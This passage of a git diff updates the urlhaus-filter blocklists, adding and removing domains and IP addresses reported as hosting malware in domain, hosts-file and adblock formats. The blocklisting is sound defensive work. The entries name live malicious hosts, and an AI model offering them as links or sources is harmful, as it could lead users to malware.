-crc2k18.mooo.com crisalic.fr crittersbythebay.com csnserver.com @@ -1434,6 +1444,7 @@ d9.99ddd.com da.alibuf.com danielbastos.com darco.pk +data.kaoyany.top data.over-blog-kiwi.com datapolish.com datvensaigon.com @@ -1492,13 +1503,13 @@ download.zjsyawqj.cn download301.wanmei.com dpeasesummithilltoppers.pbworks.com drools-moved.46999.n3.nabble.com +dudulm.com dw.58wangdun.com dx.qqyewu.com dx1.qqtn.com dx2.qqtn.com dzinestudio87.co.uk e.dangeana.com -ecoshore.ga edicolanazionale.it elokshinproperty.co.za emadamini.co.za @@ -1513,6 +1524,7 @@ expdom.ru ezfintechcorp.com fatherchildless.com fidiag.kymco.com +files.fqapps.com files.rakbot.ru files6.uludagbilisim.com fishingbigstore.com @@ -1521,6 +1533,7 @@ fkd.derpcity.ru fotobooth.at frin.ng fstation.dynu.net +fte.m.dodo52.com ftpftpftp.com funletters.net fusionfiresolutions.com @@ -1538,6 +1551,7 @@ go.xsuad.com gothw.club grafchekloder.rebatesrule.net greattastesmb.ca +greenpalace.top gssgroups.com gvpcdpgc.edu.in habbotips.free.fr @@ -1550,7 +1564,9 @@ herrdangwerder.de hfsoftware.cl hldschool.com hmbwgroup.com +hoayeuthuong-my.sharepoint.com hostzaa.com +hotart.co.nz hotel-le-relais-des-moulins.com housewifes.co hseda.com @@ -1562,10 +1578,12 @@ impression-gobelet.com inapadvance.com incrediblepixels.com incredicole.com +inigbiseijfji.ru intersel-idf.org isso.ps itd.m.dodo52.com jamiekaylive.com +jamshed.pk jansen-heesch.nl janvierassocies.fr javatank.ru @@ -1576,16 +1594,16 @@ jsq.m.dodo52.com jsya.co.kr jutvac.com jvalert.com +k.ludong.tv kachsurf.mylftv.com kamasu11.cafe24.com -kankalarnetwork.duckdns.org kanok.co.th +kanorkanor23.ru karavantekstil.com kdsp.co.kr kejpa.com kjbm9.mof.gov.cn kjcpromo.com -kleinendeli.co.za knightsbridgeenergy.com.ng kwanfromhongkong.com lameguard.ru @@ -1613,10 +1631,11 @@ lvr.samacomplus.com m.0757kd.cn m93701t2.beget.tech mackleyn.com +mammalson.com maringareservas.com.br marketinfosales.com marketprice.com.ng -mattayom31.go.th +marksidfgs.ug mazury4x4.pl mbgrm.com medianews.ge @@ -1635,7 +1654,6 @@ mfevr.com mffyjcdn.btgame.com mhkdhotbot.myvnc.com mhkdhotbot80.myvnc.com -micahproducts.com micalle.com.au migmon.club mikrokaynakmerkezi.com @@ -1656,6 +1674,8 @@ msecurity.ro mteng.mmj7.com mtfelektroteknik.com mueblesjcp.cl +mutec.jp +mv360.net mvb.kz mxpiqw.am.files.1drv.com mynydd-ednyfed-countryhouse.co.uk @@ -1665,11 +1685,13 @@ mytrains.net mywp.asia namuvpn.com narty.laserteam.pl +ndrs.cloud nebraskacharters.com.au neocity1.free.fr nerve.untergrund.net news.omumusic.net newsun-shop.com +ngoaingu.garage.com.vn nofound.000webhostapp.com norperuinge.com.pe nprg.ru @@ -1706,7 +1728,6 @@ pcsoori.com pedidoslalacteo.com.ar perfectshinehair.co.uk ph4s.ru -phamchilong.com phudieusongma.com pink99.com poisss.jhfddd.com @@ -1715,7 +1736,6 @@ ppl.ac.id prestigehomeautomation.net probost.cz prosoc.nl -protestlabsmovings.es prowin.co.th pujashoppe.in purelondonhyg.com @@ -1747,7 +1767,6 @@ ruisgood.ru rusch.nu s.51shijuan.com s.kk30.com -s289428.smrtp.ru saboorjaam.ir sadiqgill.com sahathaikasetpan.com @@ -1768,6 +1787,7 @@ simlun.com.ar sinastorage.cn sindicato1ucm.cl skyscan.com +sl9XA73g7u3EO07WT42n7f4vIn5fZH.biz small-business-solutions.biz small.962.net smccycles.com @@ -1792,8 +1812,8 @@ swwbia.com symanreni.mysecondarydns.com szxypt.com t.honker.info -tandenblekenhoofddorp.nl tattooartcreations.com +taxpos.com tcy.198424.com tehrenberg.com telescopelms.com @@ -1806,6 +1826,7 @@ thc-annex.com theprestige.ro theptiendat.com therecruiter.io +thorn-bikes.com thosewebbs.com tianangdep.com tibinst.mefound.com @@ -1814,12 +1835,12 @@ tishreycarmelim.co.il tonydong.com tonyzone.com totebarreto.com.br +tribunal.ug tsd.jxwan.com tulli.info tuneup.ibk.me tutuler.com uc-56.ru -ucto-id.cz ugc.wegame.com.cn ukks.net ukronet.ru @@ -1833,13 +1854,16 @@ urquilam.com.ar usd-gold.com uskeba.ca usmadetshirts.com +uytgvhdfsdxc.ug vadyur.github.io valedchap.ir valencaagora.com.br vaziri.echobit.ir +veyron.ir vfocus.net videoswebcammsn.free.fr vitinhvnt.com +wap.dosame.com warriorllc.com wbd.5636.com webarte.com.br @@ -1856,7 +1880,6 @@ wsg.com.sg www2.recepty5.com x2vn.com xantinas.com -xpodip.ir xtremeforumz.com yeez.net yesky.51down.org.cn @@ -1867,6 +1890,9 @@ yy31t.chokun.ru zagruz.dnset.com zagruz.toh.info zagruz.zyns.com +zaragoza.co.ug +zaragozsa.ug +zd4b.lonlyfafner.ru zdy.17110.com zeytinyagisabun.com zhetysu360.kz diff --git a/urlhaus-filter-domains.txt b/urlhaus-filter-domains.txt index ee028641..5d3987a7 100644 --- a/urlhaus-filter-domains.txt +++ b/urlhaus-filter-domains.txt @@ -1,5 +1,5 @@ # Title: Malicious Domains Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -3630,6 +3630,7 @@ 113.133.228.23 113.133.228.30 113.133.228.60 +113.133.228.85 113.133.228.91 113.133.229.149 113.133.229.185 @@ -4338,6 +4339,7 @@ 114.234.121.63 114.234.123.92 114.234.125.12 +114.234.129.202 114.234.130.210 114.234.131.130 114.234.133.189 @@ -4387,6 +4389,7 @@ 114.234.194.48 114.234.195.112 114.234.195.62 +114.234.195.71 114.234.195.96 114.234.205.180 114.234.209.152 @@ -4837,6 +4840,7 @@ 114.239.46.197 114.239.46.52 114.239.46.81 +114.239.48.65 114.239.49.169 114.239.49.180 114.239.49.236 @@ -7808,6 +7812,7 @@ 117.63.20.242 117.63.20.92 117.63.226.148 +117.63.247.13 117.63.51.128 117.63.69.253 117.63.72.213 @@ -9212,6 +9217,7 @@ 122.174.253.72 122.175.245.171 122.176.115.28 +122.176.39.179 122.176.72.49 122.176.74.247 122.176.94.96 @@ -14474,6 +14480,7 @@ 162.212.112.206 162.212.112.208 162.212.112.209 +162.212.112.211 162.212.112.213 162.212.112.216 162.212.112.218 @@ -15422,6 +15429,7 @@ 167.71.200.228 167.71.208.165 167.71.210.82 +167.71.213.57 167.71.214.117 167.71.216.150 167.71.216.201 @@ -16162,6 +16170,7 @@ 172.36.18.201 172.36.18.216 172.36.18.220 +172.36.18.248 172.36.18.255 172.36.18.41 172.36.18.84 @@ -17052,6 +17061,7 @@ 172.39.10.185 172.39.10.232 172.39.11.0 +172.39.11.138 172.39.11.179 172.39.11.213 172.39.11.23 @@ -17867,6 +17877,7 @@ 172.45.21.76 172.45.22.172 172.45.23.154 +172.45.23.180 172.45.23.241 172.45.23.7 172.45.23.86 @@ -17927,6 +17938,7 @@ 172.45.32.186 172.45.32.209 172.45.32.57 +172.45.32.74 172.45.32.9 172.45.34.188 172.45.35.11 @@ -20066,6 +20078,7 @@ 180.116.234.94 180.116.238.134 180.116.238.136 +180.116.238.144 180.116.238.199 180.116.238.75 180.116.255.241 @@ -24410,6 +24423,7 @@ 189.140.86.168 189.140.87.238 189.141.102.137 +189.141.130.30 189.145.192.124 189.147.248.169 189.148.182.221 @@ -25430,6 +25444,7 @@ 194.15.36.245 194.15.36.246 194.15.36.255 +194.15.36.37 194.15.36.41 194.15.36.42 194.15.36.43 @@ -26070,6 +26085,7 @@ 199.83.203.122 199.83.203.123 199.83.203.127 +199.83.203.131 199.83.203.132 199.83.203.134 199.83.203.137 @@ -28539,6 +28555,7 @@ 218.161.125.23 218.161.127.50 218.161.14.154 +218.161.23.184 218.161.23.33 218.161.23.94 218.161.3.200 @@ -29661,6 +29678,7 @@ 221.227.252.50 221.227.7.32 221.228.159.3 +221.229.144.191 221.229.178.227 221.229.181.157 221.229.181.224 @@ -29700,6 +29718,7 @@ 221.5.30.191 221.5.30.223 221.5.30.228 +221.5.30.247 221.5.30.56 221.5.31.113 221.5.31.165 @@ -31397,6 +31416,7 @@ 27.158.250.196 27.158.250.199 27.158.250.2 +27.158.250.210 27.158.250.219 27.158.250.43 27.158.250.7 @@ -31473,6 +31493,7 @@ 27.41.134.187 27.41.134.217 27.41.134.3 +27.41.135.16 27.41.135.170 27.41.135.173 27.41.135.19 @@ -31494,6 +31515,7 @@ 27.41.142.190 27.41.142.198 27.41.142.51 +27.41.143.216 27.41.143.79 27.41.144.66 27.41.145.113 @@ -32939,6 +32961,7 @@ 36.33.128.7 36.33.128.76 36.33.129.120 +36.33.129.122 36.33.132.139 36.33.132.206 36.33.132.89 @@ -33912,6 +33935,7 @@ 41.86.19.200 41.86.21.5 41.86.21.56 +41.86.21.60 41.86.251.38 41.89.94.30 41.92.186.135 @@ -36340,6 +36364,7 @@ 45.63.111.27 45.63.2.149 45.63.30.20 +45.63.54.207 45.63.55.136 45.63.55.68 45.63.59.67 @@ -37655,6 +37680,7 @@ 49.119.94.82 49.119.95.99 49.12.11.16 +49.12.32.67 49.143.126.72 49.143.32.36 49.143.32.43 @@ -38088,6 +38114,7 @@ 49.81.35.201 49.81.35.249 49.81.35.30 +49.81.40.23 49.81.41.46 49.81.45.177 49.81.46.194 @@ -39565,6 +39592,7 @@ 58.243.20.119 58.243.20.136 58.243.20.165 +58.243.20.168 58.243.20.194 58.243.20.197 58.243.20.212 @@ -40445,6 +40473,7 @@ 61.145.194.51 61.145.194.53 61.147.44.192 +61.147.48.95 61.147.66.239 61.153.168.8 61.153.168.81 @@ -41379,6 +41408,7 @@ 62.16.36.130 62.16.36.72 62.16.36.99 +62.16.37.183 62.16.37.33 62.16.38.36 62.16.39.52 @@ -45550,6 +45580,7 @@ 99.162.250.24 99.198.127.106 99.2.198.29 +99.232.224.138 99.3.72.74 99.36.238.25 99.44.138.176 @@ -47916,6 +47947,8 @@ alexfranco.co alexgarkavenko.com alexhhh.chat.ru alexis.monville.com +alexliasko.co.ug +alexliasko.ug alexm.co.za alexovicsattila.com alexpopow.com @@ -59368,6 +59401,7 @@ clicklenderz.com clicknaranja.mx clickneat.be clicknit.com +clickon.vn clickprintnow.com.au clickripplesolutions.in clicksbyayush.com @@ -62387,7 +62421,6 @@ dato.co.at datongsafe-taipei.org.tw datos.com.tw datos.com.ua -datphatlocsg.com datpq.com datrangsuc.com datrephuquoc.net @@ -65510,7 +65543,6 @@ dpacorp.org dparmm1.wci.com.ph dpbh.info dpbusinessportal.ro -dpcservizi.it dpe.com.tw dpeasesummithilltoppers.pbworks.com dpersonnel.ru @@ -68507,7 +68539,6 @@ esitsecurity.com eskaledoor.com eskandarb.com eskeleco.ir -eskenazo.cl eski.elt.com.tr eskilloo.com eskimue.de @@ -85827,7 +85858,6 @@ library8.bimvimdan.tk libreentreprisemagazine.com libroglobale.bid librores.press -librusfan.ru libtech.com.au libya-info.com libyabeach.tk @@ -88527,6 +88557,7 @@ mambaddd4.ru mambilerzonaldistrict.tk mameradirastislavice.sk maminsecret.ru +mammalson.com mammothstraw.com mamnonmangnondanang.edu.vn mamnontohienthanh.com @@ -93257,7 +93288,6 @@ nannyservices101.com nano40.com nanobiteuae.com nanobrain.co.kr -nanodigestmag.com nanodivulga.ufn.edu.br nanogagliato.com nanohair.com.au @@ -94982,6 +95012,7 @@ novaland.cl novamentemagra.com.br novametal.cl novaoptica.pt +novapisa.com novaplaza.com novaproductionsomaha.com novaprotravel.com @@ -98921,7 +98952,6 @@ playstationgame.tk playtech.ddnsking.com playtech.id playthefinancialgame.com -playvideo.site plaza-beauty.ru plazacolibri.com.mx plazadomino.com @@ -104702,7 +104732,6 @@ salezietes.lt salght.com salheshthemovie.com salientbrands.com -salifkeita.net salimoni.ru saling-klimatyzacje.pl salinzada.com @@ -114067,7 +114096,6 @@ thuyluckhinen.com.vn thuysankv1.com thuysinhlongthanh.com thuytienacademy.com -thyamasr.com thymedentalcare.com thyroidnutritioneducators.com thyrsi.com @@ -114348,6 +114376,7 @@ tk-pikpg.sch.id tk-spectrans.ru tkalniaobrazu.pl tkaystore.com +tkb.com.tw tkbc.co.za tkbhaktimulya.web.id tkconcept.vn diff --git a/urlhaus-filter-hosts-online.txt b/urlhaus-filter-hosts-online.txt index db8e44f8..6dbfbc02 100644 --- a/urlhaus-filter-hosts-online.txt +++ b/urlhaus-filter-hosts-online.txt @@ -1,5 +1,5 @@ # Title: Online Malicious Hosts Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -14,6 +14,7 @@ 0.0.0.0 a-reality.co.uk 0.0.0.0 abass.ir 0.0.0.0 accessyouraudience.com +0.0.0.0 acteon.com.ar 0.0.0.0 activecost.com.au 0.0.0.0 admaris.ir 0.0.0.0 admin.foa.ae @@ -23,6 +24,8 @@ 0.0.0.0 al-wahd.com 0.0.0.0 alacatibisiklet.com 0.0.0.0 alba1004.co.kr +0.0.0.0 alexliasko.co.ug +0.0.0.0 alexliasko.ug 0.0.0.0 algorithmshargh.com 0.0.0.0 allloveseries.com 0.0.0.0 alohasoftware.net @@ -49,6 +52,7 @@ 0.0.0.0 azzd.co.kr 0.0.0.0 b.frefou.ru 0.0.0.0 babaroadways.in +0.0.0.0 backgrounds.pk 0.0.0.0 bamakobleach.free.fr 0.0.0.0 bangkok-orchids.com 0.0.0.0 bapo.granudan.cn @@ -67,7 +71,6 @@ 0.0.0.0 cameli.vn 0.0.0.0 cameraforce.tv 0.0.0.0 cbk.m.dodo52.com -0.0.0.0 cdn-10049480.file.myqcloud.com 0.0.0.0 cellas.sk 0.0.0.0 cf.uuu9.com 0.0.0.0 cfs5.tistory.com @@ -82,16 +85,13 @@ 0.0.0.0 cjto.top 0.0.0.0 ckl6767.com 0.0.0.0 clearwaterriveroutfitting.com -0.0.0.0 colourcreative.co.za 0.0.0.0 commaa.com 0.0.0.0 complan.hu 0.0.0.0 complanbt.hu 0.0.0.0 comtechadsl.com -0.0.0.0 config.cqhbkjzx.com 0.0.0.0 config.kuaisousou.top -0.0.0.0 config.wwmhdq.com +0.0.0.0 config.younoteba.top 0.0.0.0 cqjcc.org -0.0.0.0 crc2k18.mooo.com 0.0.0.0 crisalic.fr 0.0.0.0 crittersbythebay.com 0.0.0.0 csnserver.com @@ -104,6 +104,7 @@ 0.0.0.0 da.alibuf.com 0.0.0.0 danielbastos.com 0.0.0.0 darco.pk +0.0.0.0 data.kaoyany.top 0.0.0.0 data.over-blog-kiwi.com 0.0.0.0 datapolish.com 0.0.0.0 datvensaigon.com @@ -162,13 +163,13 @@ 0.0.0.0 download301.wanmei.com 0.0.0.0 dpeasesummithilltoppers.pbworks.com 0.0.0.0 drools-moved.46999.n3.nabble.com +0.0.0.0 dudulm.com 0.0.0.0 dw.58wangdun.com 0.0.0.0 dx.qqyewu.com 0.0.0.0 dx1.qqtn.com 0.0.0.0 dx2.qqtn.com 0.0.0.0 dzinestudio87.co.uk 0.0.0.0 e.dangeana.com -0.0.0.0 ecoshore.ga 0.0.0.0 edicolanazionale.it 0.0.0.0 elokshinproperty.co.za 0.0.0.0 emadamini.co.za @@ -183,6 +184,7 @@ 0.0.0.0 ezfintechcorp.com 0.0.0.0 fatherchildless.com 0.0.0.0 fidiag.kymco.com +0.0.0.0 files.fqapps.com 0.0.0.0 files.rakbot.ru 0.0.0.0 files6.uludagbilisim.com 0.0.0.0 fishingbigstore.com @@ -191,6 +193,7 @@ 0.0.0.0 fotobooth.at 0.0.0.0 frin.ng 0.0.0.0 fstation.dynu.net +0.0.0.0 fte.m.dodo52.com 0.0.0.0 ftpftpftp.com 0.0.0.0 funletters.net 0.0.0.0 fusionfiresolutions.com @@ -208,6 +211,7 @@ 0.0.0.0 gothw.club 0.0.0.0 grafchekloder.rebatesrule.net 0.0.0.0 greattastesmb.ca +0.0.0.0 greenpalace.top 0.0.0.0 gssgroups.com 0.0.0.0 gvpcdpgc.edu.in 0.0.0.0 habbotips.free.fr @@ -220,7 +224,9 @@ 0.0.0.0 hfsoftware.cl 0.0.0.0 hldschool.com 0.0.0.0 hmbwgroup.com +0.0.0.0 hoayeuthuong-my.sharepoint.com 0.0.0.0 hostzaa.com +0.0.0.0 hotart.co.nz 0.0.0.0 hotel-le-relais-des-moulins.com 0.0.0.0 housewifes.co 0.0.0.0 hseda.com @@ -232,10 +238,12 @@ 0.0.0.0 inapadvance.com 0.0.0.0 incrediblepixels.com 0.0.0.0 incredicole.com +0.0.0.0 inigbiseijfji.ru 0.0.0.0 intersel-idf.org 0.0.0.0 isso.ps 0.0.0.0 itd.m.dodo52.com 0.0.0.0 jamiekaylive.com +0.0.0.0 jamshed.pk 0.0.0.0 jansen-heesch.nl 0.0.0.0 janvierassocies.fr 0.0.0.0 javatank.ru @@ -246,16 +254,16 @@ 0.0.0.0 jsya.co.kr 0.0.0.0 jutvac.com 0.0.0.0 jvalert.com +0.0.0.0 k.ludong.tv 0.0.0.0 kachsurf.mylftv.com 0.0.0.0 kamasu11.cafe24.com -0.0.0.0 kankalarnetwork.duckdns.org 0.0.0.0 kanok.co.th +0.0.0.0 kanorkanor23.ru 0.0.0.0 karavantekstil.com 0.0.0.0 kdsp.co.kr 0.0.0.0 kejpa.com 0.0.0.0 kjbm9.mof.gov.cn 0.0.0.0 kjcpromo.com -0.0.0.0 kleinendeli.co.za 0.0.0.0 knightsbridgeenergy.com.ng 0.0.0.0 kwanfromhongkong.com 0.0.0.0 lameguard.ru @@ -283,10 +291,11 @@ 0.0.0.0 m.0757kd.cn 0.0.0.0 m93701t2.beget.tech 0.0.0.0 mackleyn.com +0.0.0.0 mammalson.com 0.0.0.0 maringareservas.com.br 0.0.0.0 marketinfosales.com 0.0.0.0 marketprice.com.ng -0.0.0.0 mattayom31.go.th +0.0.0.0 marksidfgs.ug 0.0.0.0 mazury4x4.pl 0.0.0.0 mbgrm.com 0.0.0.0 medianews.ge @@ -305,7 +314,6 @@ 0.0.0.0 mffyjcdn.btgame.com 0.0.0.0 mhkdhotbot.myvnc.com 0.0.0.0 mhkdhotbot80.myvnc.com -0.0.0.0 micahproducts.com 0.0.0.0 micalle.com.au 0.0.0.0 migmon.club 0.0.0.0 mikrokaynakmerkezi.com @@ -326,6 +334,8 @@ 0.0.0.0 mteng.mmj7.com 0.0.0.0 mtfelektroteknik.com 0.0.0.0 mueblesjcp.cl +0.0.0.0 mutec.jp +0.0.0.0 mv360.net 0.0.0.0 mvb.kz 0.0.0.0 mxpiqw.am.files.1drv.com 0.0.0.0 mynydd-ednyfed-countryhouse.co.uk @@ -335,11 +345,13 @@ 0.0.0.0 mywp.asia 0.0.0.0 namuvpn.com 0.0.0.0 narty.laserteam.pl +0.0.0.0 ndrs.cloud 0.0.0.0 nebraskacharters.com.au 0.0.0.0 neocity1.free.fr 0.0.0.0 nerve.untergrund.net 0.0.0.0 news.omumusic.net 0.0.0.0 newsun-shop.com +0.0.0.0 ngoaingu.garage.com.vn 0.0.0.0 nofound.000webhostapp.com 0.0.0.0 norperuinge.com.pe 0.0.0.0 nprg.ru @@ -376,7 +388,6 @@ 0.0.0.0 pedidoslalacteo.com.ar 0.0.0.0 perfectshinehair.co.uk 0.0.0.0 ph4s.ru -0.0.0.0 phamchilong.com 0.0.0.0 phudieusongma.com 0.0.0.0 pink99.com 0.0.0.0 poisss.jhfddd.com @@ -385,7 +396,6 @@ 0.0.0.0 prestigehomeautomation.net 0.0.0.0 probost.cz 0.0.0.0 prosoc.nl -0.0.0.0 protestlabsmovings.es 0.0.0.0 prowin.co.th 0.0.0.0 pujashoppe.in 0.0.0.0 purelondonhyg.com @@ -417,7 +427,6 @@ 0.0.0.0 rusch.nu 0.0.0.0 s.51shijuan.com 0.0.0.0 s.kk30.com -0.0.0.0 s289428.smrtp.ru 0.0.0.0 saboorjaam.ir 0.0.0.0 sadiqgill.com 0.0.0.0 sahathaikasetpan.com @@ -438,6 +447,7 @@ 0.0.0.0 sinastorage.cn 0.0.0.0 sindicato1ucm.cl 0.0.0.0 skyscan.com +0.0.0.0 sl9XA73g7u3EO07WT42n7f4vIn5fZH.biz 0.0.0.0 small-business-solutions.biz 0.0.0.0 small.962.net 0.0.0.0 smccycles.com @@ -462,8 +472,8 @@ 0.0.0.0 symanreni.mysecondarydns.com 0.0.0.0 szxypt.com 0.0.0.0 t.honker.info -0.0.0.0 tandenblekenhoofddorp.nl 0.0.0.0 tattooartcreations.com +0.0.0.0 taxpos.com 0.0.0.0 tcy.198424.com 0.0.0.0 tehrenberg.com 0.0.0.0 telescopelms.com @@ -476,6 +486,7 @@ 0.0.0.0 theprestige.ro 0.0.0.0 theptiendat.com 0.0.0.0 therecruiter.io +0.0.0.0 thorn-bikes.com 0.0.0.0 thosewebbs.com 0.0.0.0 tianangdep.com 0.0.0.0 tibinst.mefound.com @@ -484,12 +495,12 @@ 0.0.0.0 tonydong.com 0.0.0.0 tonyzone.com 0.0.0.0 totebarreto.com.br +0.0.0.0 tribunal.ug 0.0.0.0 tsd.jxwan.com 0.0.0.0 tulli.info 0.0.0.0 tuneup.ibk.me 0.0.0.0 tutuler.com 0.0.0.0 uc-56.ru -0.0.0.0 ucto-id.cz 0.0.0.0 ugc.wegame.com.cn 0.0.0.0 ukks.net 0.0.0.0 ukronet.ru @@ -503,13 +514,16 @@ 0.0.0.0 usd-gold.com 0.0.0.0 uskeba.ca 0.0.0.0 usmadetshirts.com +0.0.0.0 uytgvhdfsdxc.ug 0.0.0.0 vadyur.github.io 0.0.0.0 valedchap.ir 0.0.0.0 valencaagora.com.br 0.0.0.0 vaziri.echobit.ir +0.0.0.0 veyron.ir 0.0.0.0 vfocus.net 0.0.0.0 videoswebcammsn.free.fr 0.0.0.0 vitinhvnt.com +0.0.0.0 wap.dosame.com 0.0.0.0 warriorllc.com 0.0.0.0 wbd.5636.com 0.0.0.0 webarte.com.br @@ -526,7 +540,6 @@ 0.0.0.0 www2.recepty5.com 0.0.0.0 x2vn.com 0.0.0.0 xantinas.com -0.0.0.0 xpodip.ir 0.0.0.0 xtremeforumz.com 0.0.0.0 yeez.net 0.0.0.0 yesky.51down.org.cn @@ -537,6 +550,9 @@ 0.0.0.0 zagruz.dnset.com 0.0.0.0 zagruz.toh.info 0.0.0.0 zagruz.zyns.com +0.0.0.0 zaragoza.co.ug +0.0.0.0 zaragozsa.ug +0.0.0.0 zd4b.lonlyfafner.ru 0.0.0.0 zdy.17110.com 0.0.0.0 zeytinyagisabun.com 0.0.0.0 zhetysu360.kz diff --git a/urlhaus-filter-hosts.txt b/urlhaus-filter-hosts.txt index b1be3397..2eca1bc7 100644 --- a/urlhaus-filter-hosts.txt +++ b/urlhaus-filter-hosts.txt @@ -1,5 +1,5 @@ # Title: Malicious Hosts Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -3752,6 +3752,8 @@ 0.0.0.0 alexgarkavenko.com 0.0.0.0 alexhhh.chat.ru 0.0.0.0 alexis.monville.com +0.0.0.0 alexliasko.co.ug +0.0.0.0 alexliasko.ug 0.0.0.0 alexm.co.za 0.0.0.0 alexovicsattila.com 0.0.0.0 alexpopow.com @@ -15204,6 +15206,7 @@ 0.0.0.0 clicknaranja.mx 0.0.0.0 clickneat.be 0.0.0.0 clicknit.com +0.0.0.0 clickon.vn 0.0.0.0 clickprintnow.com.au 0.0.0.0 clickripplesolutions.in 0.0.0.0 clicksbyayush.com @@ -18223,7 +18226,6 @@ 0.0.0.0 datongsafe-taipei.org.tw 0.0.0.0 datos.com.tw 0.0.0.0 datos.com.ua -0.0.0.0 datphatlocsg.com 0.0.0.0 datpq.com 0.0.0.0 datrangsuc.com 0.0.0.0 datrephuquoc.net @@ -21346,7 +21348,6 @@ 0.0.0.0 dparmm1.wci.com.ph 0.0.0.0 dpbh.info 0.0.0.0 dpbusinessportal.ro -0.0.0.0 dpcservizi.it 0.0.0.0 dpe.com.tw 0.0.0.0 dpeasesummithilltoppers.pbworks.com 0.0.0.0 dpersonnel.ru @@ -24343,7 +24344,6 @@ 0.0.0.0 eskaledoor.com 0.0.0.0 eskandarb.com 0.0.0.0 eskeleco.ir -0.0.0.0 eskenazo.cl 0.0.0.0 eski.elt.com.tr 0.0.0.0 eskilloo.com 0.0.0.0 eskimue.de @@ -41663,7 +41663,6 @@ 0.0.0.0 libreentreprisemagazine.com 0.0.0.0 libroglobale.bid 0.0.0.0 librores.press -0.0.0.0 librusfan.ru 0.0.0.0 libtech.com.au 0.0.0.0 libya-info.com 0.0.0.0 libyabeach.tk @@ -44363,6 +44362,7 @@ 0.0.0.0 mambilerzonaldistrict.tk 0.0.0.0 mameradirastislavice.sk 0.0.0.0 maminsecret.ru +0.0.0.0 mammalson.com 0.0.0.0 mammothstraw.com 0.0.0.0 mamnonmangnondanang.edu.vn 0.0.0.0 mamnontohienthanh.com @@ -49093,7 +49093,6 @@ 0.0.0.0 nano40.com 0.0.0.0 nanobiteuae.com 0.0.0.0 nanobrain.co.kr -0.0.0.0 nanodigestmag.com 0.0.0.0 nanodivulga.ufn.edu.br 0.0.0.0 nanogagliato.com 0.0.0.0 nanohair.com.au @@ -50818,6 +50817,7 @@ 0.0.0.0 novamentemagra.com.br 0.0.0.0 novametal.cl 0.0.0.0 novaoptica.pt +0.0.0.0 novapisa.com 0.0.0.0 novaplaza.com 0.0.0.0 novaproductionsomaha.com 0.0.0.0 novaprotravel.com @@ -54757,7 +54757,6 @@ 0.0.0.0 playtech.ddnsking.com 0.0.0.0 playtech.id 0.0.0.0 playthefinancialgame.com -0.0.0.0 playvideo.site 0.0.0.0 plaza-beauty.ru 0.0.0.0 plazacolibri.com.mx 0.0.0.0 plazadomino.com @@ -60538,7 +60537,6 @@ 0.0.0.0 salght.com 0.0.0.0 salheshthemovie.com 0.0.0.0 salientbrands.com -0.0.0.0 salifkeita.net 0.0.0.0 salimoni.ru 0.0.0.0 saling-klimatyzacje.pl 0.0.0.0 salinzada.com @@ -69900,7 +69898,6 @@ 0.0.0.0 thuysankv1.com 0.0.0.0 thuysinhlongthanh.com 0.0.0.0 thuytienacademy.com -0.0.0.0 thyamasr.com 0.0.0.0 thymedentalcare.com 0.0.0.0 thyroidnutritioneducators.com 0.0.0.0 thyrsi.com @@ -70181,6 +70178,7 @@ 0.0.0.0 tk-spectrans.ru 0.0.0.0 tkalniaobrazu.pl 0.0.0.0 tkaystore.com +0.0.0.0 tkb.com.tw 0.0.0.0 tkbc.co.za 0.0.0.0 tkbhaktimulya.web.id 0.0.0.0 tkconcept.vn diff --git a/urlhaus-filter-online.txt b/urlhaus-filter-online.txt index 6418e507..0cffc385 100644 --- a/urlhaus-filter-online.txt +++ b/urlhaus-filter-online.txt @@ -1,11 +1,11 @@ ! Title: Online Malicious URL Blocklist -! Updated: Sun, 12 Jul 2020 12:09:57 UTC +! Updated: Mon, 13 Jul 2020 00:09:51 UTC ! Expires: 1 day (update frequency) ! Repo: https://gitlab.com/curben/urlhaus-filter ! License: https://creativecommons.org/publicdomain/zero/1.0/ ! Source: https://urlhaus.abuse.ch/api/ -||1.11.132.252^ ||1.11.157.111^ +||1.176.89.252^ ||1.246.222.105^ ||1.246.222.107^ ||1.246.222.109^ @@ -37,7 +37,6 @@ ||1.246.223.103^ ||1.246.223.109^ ||1.246.223.10^ -||1.246.223.125^ ||1.246.223.126^ ||1.246.223.127^ ||1.246.223.130^ @@ -48,11 +47,13 @@ ||1.246.223.22^ ||1.246.223.30^ ||1.246.223.32^ +||1.246.223.35^ ||1.246.223.3^ ||1.246.223.49^ ||1.246.223.54^ ||1.246.223.61^ ||1.246.223.64^ +||1.246.223.6^ ||1.246.223.71^ ||1.246.223.74^ ||1.246.223.94^ @@ -68,9 +69,11 @@ ||101.255.36.146^ ||101.255.36.154^ ||101.255.54.38^ +||102.141.241.14^ ||102.182.126.91^ ||103.102.68.27^ ||103.110.49.20^ +||103.116.87.130^ ||103.125.218.107^ ||103.139.219.9^ ||103.141.138.247^ @@ -81,18 +84,15 @@ ||103.221.254.130^ ||103.224.185.4^ ||103.230.62.146^ -||103.234.226.133^ ||103.237.173.218^ ||103.240.249.121^ ||103.255.235.219^ ||103.31.47.214^ ||103.4.117.26^ +||103.42.252.130^ ||103.50.4.235^ -||103.50.7.19^ ||103.70.130.26^ -||103.79.112.254^ ||103.80.210.9^ -||103.85.24.190^ ||103.92.123.195^ ||103.92.25.90^ ||103.92.25.95^ @@ -110,7 +110,6 @@ ||106.105.197.111^ ||106.105.218.18^ ||106.110.111.40^ -||106.43.108.255^ ||107.142.169.193^ ||107.144.64.190^ ||107.189.11.170^ @@ -125,18 +124,15 @@ ||108.77.246.129^ ||108.80.60.218^ ||108.83.164.236^ -||109.104.197.153^ ||109.107.88.91^ ||109.124.90.229^ ||109.233.196.232^ ||109.235.7.228^ -||109.248.58.238^ ||109.86.85.253^ ||109.88.185.119^ ||109.95.200.102^ ||109.96.57.246^ ||110.155.57.6^ -||110.34.3.142^ ||110.49.109.152^ ||111.0.124.232^ ||111.125.67.125^ @@ -147,14 +143,11 @@ 